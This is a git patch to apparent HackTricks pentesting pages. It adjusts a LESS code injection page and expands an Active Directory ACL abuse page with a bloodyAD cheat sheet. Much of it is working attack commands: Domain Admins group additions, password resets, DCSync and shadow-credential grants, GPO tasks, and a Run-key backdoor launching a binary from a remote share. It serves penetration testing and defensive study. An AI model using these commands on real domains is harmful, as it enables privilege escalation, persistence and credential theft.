From 0d24496adb00c31caa385b3248fe8a9a492f7b55 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Sun, 9 Nov 2025 18:33:34 +0000 Subject: [PATCH] =?UTF-8?q?Add=20content=20from:=20bloodyAD=20User=20Guide?= =?UTF-8?q?=20=E2=80=94=20AD=20Privesc=20Swiss=20Army=20Knife?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../css-injection/less-code-injection.md | 7 +- .../acl-persistence-abuse/README.md | 183 +++++++++++++----- 2 files changed, 143 insertions(+), 47 deletions(-) diff --git a/src/pentesting-web/xs-search/css-injection/less-code-injection.md b/src/pentesting-web/xs-search/css-injection/less-code-injection.md index b9d599deb30..6d338df2b68 100644 --- a/src/pentesting-web/xs-search/css-injection/less-code-injection.md +++ b/src/pentesting-web/xs-search/css-injection/less-code-injection.md @@ -1,4 +1,6 @@ -## LESS Code Injection leading to SSRF & Local File Read +# LESS Code Injection leading to SSRF & Local File Read + +{{#include ../../../banners/hacktricks-training.md}} LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive. During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed ("inline") their contents into the resulting CSS when the `(inline)` option is used. @@ -59,4 +61,5 @@ curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \ * [SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability](https://karmainsecurity.com/KIS-2025-04) * [SugarCRM Security Advisory SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/) -* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258) \ No newline at end of file +* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258) +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md index 0c73c9bdf9b..b9b2d21c242 100644 --- a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md +++ b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md @@ -31,7 +31,7 @@ bloodyAD --host -d -u -p '' remove uac -Set @{serviceprincipalname="fake/NOTHING"} .\Rubeus.exe kerberoast /user: /nowrap Set-DomainObject -Credential $creds -Identity -Clear serviceprincipalname -Verbose @@ -39,7 +39,7 @@ Set-DomainObject -Credential $creds -Identity -Clear serviceprincipal - **Targeted ASREPRoasting**: Disable pre-authentication for the user, making their account vulnerable to ASREPRoasting. -```bash +```powershell Set-DomainObject -Identity -XOR @{UserAccountControl=4194304} ``` @@ -55,7 +55,7 @@ This privilege allows an attacker to manipulate group memberships if they have ` - **Add Themselves to the Domain Admins Group**: This can be done via direct commands or using modules like Active Directory or PowerSploit. -```bash +```powershell net group "domain admins" spotless /add /domain Add-ADGroupMember -Identity "domain admins" -Members spotless Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local" @@ -84,7 +84,7 @@ If a user has `WriteProperty` rights on all objects for a specific group (e.g., - **Add Themselves to the Domain Admins Group**: Achievable via combining `net user` and `Add-NetGroupUser` commands, this method allows privilege escalation within the domain. -```bash +```powershell net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain ``` @@ -92,7 +92,7 @@ net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domai This privilege enables attackers to add themselves to specific groups, such as `Domain Admins`, through commands that manipulate group membership directly. Using the following command sequence allows for self-addition: -```bash +```powershell net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain ``` @@ -100,7 +100,7 @@ net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domai A similar privilege, this allows attackers to directly add themselves to groups by modifying group properties if they have the `WriteProperty` right on those groups. The confirmation and execution of this privilege are performed with: -```bash +```powershell Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"} net group "domain admins" spotless /add /domain ``` @@ -109,7 +109,7 @@ net group "domain admins" spotless /add /domain Holding the `ExtendedRight` on a user for `User-Force-Change-Password` allows password resets without knowing the current password. Verification of this right and its exploitation can be done through PowerShell or alternative command-line tools, offering several methods to reset a user's password, including interactive sessions and one-liners for non-interactive environments. The commands range from simple PowerShell invocations to using `rpcclient` on Linux, demonstrating the versatility of attack vectors. -```bash +```powershell Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"} Set-DomainUserPassword -Identity delegate -Verbose Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose @@ -124,7 +124,7 @@ rpcclient -U KnownUsername 10.10.10.192 If an attacker finds that they have `WriteOwner` rights over a group, they can change the ownership of the group to themselves. This is particularly impactful when the group in question is `Domain Admins`, as changing ownership allows for broader control over group attributes and membership. The process involves identifying the correct object via `Get-ObjectAcl` and then using `Set-DomainObjectOwner` to modify the owner, either by SID or name. -```bash +```powershell Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"} Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -OwnerIdentity "spotless" -Verbose Set-DomainObjectOwner -Identity Herman -OwnerIdentity nico @@ -134,7 +134,7 @@ Set-DomainObjectOwner -Identity Herman -OwnerIdentity nico This permission allows an attacker to modify user properties. Specifically, with `GenericWrite` access, the attacker can change the logon script path of a user to execute a malicious script upon user logon. This is achieved by using the `Set-ADObject` command to update the `scriptpath` property of the target user to point to the attacker's script. -```bash +```powershell Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1" ``` @@ -142,7 +142,7 @@ Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\ With this privilege, attackers can manipulate group membership, such as adding themselves or other users to specific groups. This process involves creating a credential object, using it to add or remove users from a group, and verifying the membership changes with PowerShell commands. -```bash +```powershell $pwd = ConvertTo-SecureString 'JustAWeirdPwd!$' -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential('DOMAIN\username', $pwd) Add-DomainGroupMember -Credential $creds -Identity 'Group Name' -Members 'username' -Verbose @@ -163,7 +163,7 @@ net rpc group members "" -U /%'' -S Owning an AD object and having `WriteDACL` privileges on it enables an attacker to grant themselves `GenericAll` privileges over the object. This is accomplished through ADSI manipulation, allowing for full control over the object and the ability to modify its group memberships. Despite this, limitations exist when trying to exploit these privileges using the Active Directory module's `Set-Acl` / `Get-Acl` cmdlets. -```bash +```powershell $ADSI = [ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local" $IdentityReference = (New-Object System.Security.Principal.NTAccount("spotless")).Translate([System.Security.Principal.SecurityIdentifier]) $ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference,"GenericAll","Allow" @@ -200,21 +200,13 @@ Set-DomainObjectOwner -Identity -OwnerIdentity The DCSync attack leverages specific replication permissions on the domain to mimic a Domain Controller and synchronize data, including user credentials. This powerful technique requires permissions like `DS-Replication-Get-Changes`, allowing attackers to extract sensitive information from the AD environment without direct access to a Domain Controller. [**Learn more about the DCSync attack here.**](../dcsync.md) -## GPO Delegation - -### GPO Delegation - -Delegated access to manage Group Policy Objects (GPOs) can present significant security risks. For instance, if a user such as `offense\spotless` is delegated GPO management rights, they may have privileges like **WriteProperty**, **WriteDacl**, and **WriteOwner**. These permissions can be abused for malicious purposes, as identified using PowerView: `bash Get-ObjectAcl -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}` +## GPO Delegation -### Enumerate GPO Permissions +To identify misconfigured GPOs, PowerSploit's cmdlets can be chained together. This allows for the discovery of GPOs that a specific user has permissions to manage: `Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "OFFENSE\spotless"}` -To identify misconfigured GPOs, PowerSploit's cmdlets can be chained together. This allows for the discovery of GPOs that a specific user has permissions to manage: `powershell Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "OFFENSE\spotless"}` - -**Computers with a Given Policy Applied**: It's possible to resolve which computers a specific GPO applies to, helping understand the scope of potential impact. `powershell Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_}` - -**Policies Applied to a Given Computer**: To see what policies are applied to a particular computer, commands like `Get-DomainGPO` can be utilized. - -**OUs with a Given Policy Applied**: Identifying organizational units (OUs) affected by a given policy can be done using `Get-DomainOU`. +- **Computers with a Given Policy Applied**: It's possible to resolve which computers a specific GPO applies to, helping understand the scope of potential impact. `Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_}` +- **Policies Applied to a Given Computer**: To see what policies are applied to a particular computer, commands like `Get-DomainGPO` can be utilized. +- **OUs with a Given Policy Applied**: Identifying organizational units (OUs) affected by a given policy can be done using `Get-DomainOU`. You can also use the tool [**GPOHound**](https://github.com/cogiceo/GPOHound) to enumerate GPOs and find issues in them. @@ -222,7 +214,7 @@ You can also use the tool [**GPOHound**](https://github.com/cogiceo/GPOHound) to Misconfigured GPOs can be exploited to execute code, for example, by creating an immediate scheduled task. This can be done to add a user to the local administrators group on affected machines, significantly elevating privileges: -```bash +```powershell New-GPOImmediateTask -TaskName evilTask -Command cmd -CommandArguments "/c net localgroup administrators spotless /add" -GPODisplayName "Misconfigured Policy" -Verbose -Force ``` @@ -230,7 +222,7 @@ New-GPOImmediateTask -TaskName evilTask -Command cmd -CommandArguments "/c net l The GroupPolicy module, if installed, allows for the creation and linking of new GPOs, and setting preferences such as registry values to execute backdoors on affected computers. This method requires the GPO to be updated and a user to log in to the computer for execution: -```bash +```powershell New-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=dev,DC=domain,DC=io" Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "%COMSPEC% /b /c start /b /min \\dc-2\software\pivot.exe" -Type ExpandString ``` @@ -239,7 +231,7 @@ Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key " SharpGPOAbuse offers a method to abuse existing GPOs by adding tasks or modifying settings without the need to create new GPOs. This tool requires modification of existing GPOs or using RSAT tools to create new ones before applying changes: -```bash +```powershell .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Install Updates" --Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c \\dc-2\software\pivot.exe" --GPOName "PowerShell Logging" ``` @@ -247,20 +239,6 @@ SharpGPOAbuse offers a method to abuse existing GPOs by adding tasks or modifyin GPO updates typically occur around every 90 minutes. To expedite this process, especially after implementing a change, the `gpupdate /force` command can be used on the target computer to force an immediate policy update. This command ensures that any modifications to GPOs are applied without waiting for the next automatic update cycle. -### Under the Hood - -Upon inspection of the Scheduled Tasks for a given GPO, like the `Misconfigured Policy`, the addition of tasks such as `evilTask` can be confirmed. These tasks are created through scripts or command-line tools aiming to modify system behavior or escalate privileges. - -The structure of the task, as shown in the XML configuration file generated by `New-GPOImmediateTask`, outlines the specifics of the scheduled task - including the command to be executed and its triggers. This file represents how scheduled tasks are defined and managed within GPOs, providing a method for executing arbitrary commands or scripts as part of policy enforcement. - -### Users and Groups - -GPOs also allow for the manipulation of user and group memberships on target systems. By editing the Users and Groups policy files directly, attackers can add users to privileged groups, such as the local `administrators` group. This is possible through the delegation of GPO management permissions, which permits the modification of policy files to include new users or change group memberships. - -The XML configuration file for Users and Groups outlines how these changes are implemented. By adding entries to this file, specific users can be granted elevated privileges across affected systems. This method offers a direct approach to privilege escalation through GPO manipulation. - -Furthermore, additional methods for executing code or maintaining persistence, such as leveraging logon/logoff scripts, modifying registry keys for autoruns, installing software via .msi files, or editing service configurations, can also be considered. These techniques provide various avenues for maintaining access and controlling target systems through the abuse of GPOs. - ## SYSVOL/NETLOGON Logon Script Poisoning Writable paths under `\\\SYSVOL\\scripts\` or `\\\NETLOGON\` allow tampering with logon scripts executed at user logon via GPO. This yields code execution in the security context of logging users. @@ -326,6 +304,124 @@ Notes: - Clean up by restoring the original content/timestamps after use. +## bloodyAD — AD ACL/Delegation abuse from Linux (cheat sheet) + +bloodyAD is a CLI “AD privesc Swiss army knife” to write ACLs/attributes and enable common attack paths without RSAT/PowerView. It speaks LDAP/GC with NTLM, Kerberos (password/keys/TGT), PKINIT or Schannel and supports LDAPS. + +Quick session/auth flags + +- Target/DC: -H `` [-i ``] [--dns ``] [--gc] +- Auth: -d `` -u `` -p `` + - NTLM accepts LMHASH:NTHASH in `-p` + - Kerberos: `-k` with password or key (rc4/aes) or tickets: `-k ccache=/path/Admin.ccache | kirbi=/path/ticket.kirbi | keytab=/path/file.keytab` + - PKINIT / Schannel: `-c "key_path:cert_path"` (with `-k` enables PKINIT) +- Transport: `-s` for LDAPS (recommended); `-ss` disables signing/sealing (debugging only) +- Output/verbosity: `--json` and `-v {QUIET,INFO,DEBUG,TRACE}` + +Offensive write primitives (ACL/Delegation) + +- Grant DCSync on the domain object to a trustee (requires ownership or WriteDacl on the domain object): + +```bash +bloodyAD -H -d -u -p '' add dcsync +``` + +- Resource-Based Constrained Delegation (write msDS-AllowedToActOnBehalfOfOtherIdentity on target computer): + +```bash +bloodyAD -H -d -u -p '' add rbcd +# Afterwards, request an impersonation TGS with impacket-getST or Rubeus and access the target service. +``` + +- Shadow Credentials (KeyCredentialLink) to obtain a TGT/NT hash via PKINIT: + +```bash +# Writes a new KeyCredential to msDS-KeyCredentialLink on the target principal +bloodyAD -H -d -u -p '' add shadowCredentials --path ./out +``` + +Preconditions for shadowCredentials: +- At least one Windows Server 2016 DC (domainControllerFunctionality ≥ 7) and schema supporting msDS-KeyCredentialLink +- Write access to the attribute on the target object +- AD CS/PKINIT available to redeem a TGT; if PKINIT fails, bloodyAD can still drop PFX for later use + +- GenericAll foothold (grant full control on an object to a trustee): + +```bash +bloodyAD -H -d -u -p '' add genericAll +``` + +- Group membership edits (supports foreign principals): + +```bash +bloodyAD -H -d -u -p '' add groupMember "" +``` + +- UAC flagging for persistence/attack enablement: + +```bash +# Examples: DONT_REQ_PREAUTH, DONT_EXPIRE_PASSWORD, ACCOUNTDISABLE +bloodyAD -H -d -u -p '' add uac -f DONT_REQ_PREAUTH -f DONT_EXPIRE_PASSWORD +``` + +- Create users/computers (supports dynamic objects with limited lifetime): + +```bash +# New user +bloodyAD -H -d -u -p '' add user '' [--ou ''] [--lifetime ] + +# New computer (set dNSHostName automatically) +# Tip: ensure -d is the domain FQDN to avoid dNSHostName constraint errors (problem 1005 / Att 9026b) +bloodyAD -H -d -u -p '' add computer '' [--ou ''] [--lifetime ] +``` + +- BadSuccessor (DMSA backdoor for privilege migration/persistence): + +```bash +# Create a Dedicated Managed Service Account and configure successors +bloodyAD -H -d -u -p '' add badSuccessor -t '' -t '' [--ou ''] +``` + +AD-integrated DNS manipulation (persistence, traffic steering) + +```bash +# Add/modify a record (A/AAAA/CNAME/MX/PTR/SRV/TXT). Use low --ttl for fast propagation. +# MX: --preference lower_is_preferred +# SRV: --priority lower_wins, --weight tiebreak +bloodyAD -H -d -u -p '' add dnsRecord \ + --dnstype A --zone --ttl 60 +# Example: add A test.domain.local → 8.8.8.8 in the domain zone +bloodyAD -H -d domain.local -u -p '' add dnsRecord test.domain.local 8.8.8.8 +``` + +Discovery helpers for path building + +```bash +# Minimal BloodHound CE collector (basic nodes) +bloodyAD -H -d -u -p '' get bloodhound --path ./bh.zip [--transitive] + +# What do I own? (objects writable by current principal) +bloodyAD -H -d -u -p '' get writable + +# Trusts (ASCII tree: A->B = A can auth on B) +bloodyAD -H -d -u -p '' get trusts + +# Dump readable AD-integrated DNS +bloodyAD -H -d -u -p '' get dnsDump + +# Membership of a principal +bloodyAD -H -d -u -p '' get membership + +# Raw LDAP fetch/search +bloodyAD -H -d -u -p '' get object --attr --attr +bloodyAD -H -d -u -p '' get search --filter '(objectClass=user)' --attrs sAMAccountName,objectSid +``` + +Notes +- Prefer LDAPS (`-s`) where possible; only use `-ss` to troubleshoot. +- Many flows support Kerberos-only with `-k`; you can fully operate with a ccache (`KRB5CCNAME`) instead of a password. +- Use `--json` for machine-readable output; `-v TRACE` for troubleshooting the LDAP binds and writes. + ## References - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) @@ -334,12 +430,9 @@ Notes: - [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2) - [https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) - [https://adsecurity.org/?p=3658](https://adsecurity.org/?p=3658) -- [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule\_\_ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType\_](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule__ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType_) - [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule__ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType_](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule__ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType_) - [BloodyAD – AD attribute/UAC operations from Linux](https://github.com/CravateRouge/bloodyAD) - [Samba – net rpc (group membership)](https://www.samba.org/) -- [HTB Puppy: AD ACL abuse, KeePassXC Argon2 cracking, and DPAPI decryption to DC admin](https://0xdf.gitlab.io/2025/09/27/htb-puppy.html) +- [bloodyAD User Guide](https://github.com/CravateRouge/bloodyAD/wiki/User-Guide) {{#include ../../../banners/hacktricks-training.md}} - -